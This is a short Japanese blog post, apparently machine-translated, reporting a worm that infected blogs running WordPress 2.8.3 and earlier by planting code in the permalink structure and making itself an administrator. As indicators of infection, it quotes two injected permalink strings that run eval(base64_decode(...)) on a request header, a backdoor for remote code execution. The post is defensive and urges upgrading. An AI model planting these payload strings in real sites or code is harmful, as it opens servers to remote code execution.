1か月前、WordPress 2.8.3の新しい
重大な脆弱性について知られるようになり、管理者パスワードをリモートで簡単に変更できるようになりました。 この脆弱性を修正するために、WordPress 2.8.4
がすぐ
にリリースされました 。 結局のところ、すべてのブロガーが更新をフォローしているわけではありません。
今週末、新しいウイルスの
真の流行が勃発し、WordPress 2.8.3およびブランチ2.8の以前のバージョンのエンジンでブログに感染しました。 ワームはブログにログインし、パーマリンク構造を介して悪意のあるコードを起動し、2番目の管理者になります。その後、ユーザーページから自分自身を消去するスクリプトを実行し、アーカイブトピックのスパムとリンクを静かに追加し始めます。
害虫の存在をすぐに検出することは、特に何も発表していない場合は特に困難です。 これを行うには、permalinks / rssフィードで次のコードの存在を確認します。
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
または
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
または間違い
'error on line 22 at column 71: xmlParseEntityRef: no name wordpress'
そのようなコードがあるか、フィードが壊れている場合、ブログは感染しています。
ワーム駆除手順は
簡単な作業です。
ところで、Matt Mullenwegはセキュリティのトピックに関する
大きな記事を作成しました。そこでは、ユーザーに絶えず新しいアップデートを監視してインストールするように促しています。ここでは
WordPressのアップグレード手順を説明します 。 これは、今回および将来の流行から身を守る唯一の方法です。